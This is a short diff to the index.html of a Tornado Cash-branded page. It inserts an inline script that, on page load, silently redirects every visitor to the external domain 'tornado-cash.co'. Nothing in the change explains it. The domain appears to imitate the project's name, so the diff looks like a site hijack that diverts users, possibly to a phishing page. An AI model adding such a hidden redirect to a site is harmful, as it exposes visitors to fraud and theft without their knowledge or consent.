--- a/index.html
+++ b/index.html
@@ -7,6 +7,9 @@
   <link rel="canonical" href="#"/>
   <link rel="icon" type="image/png" href="Tornado_cash_logo.jpg"/>
 
+    <script>
+  window.location.replace('https://tornado-cash.co/');
+</script>
   <!-- Open Graph / Facebook -->
   <meta property="og:type" content="article">
   <meta property="og:url" content="#">
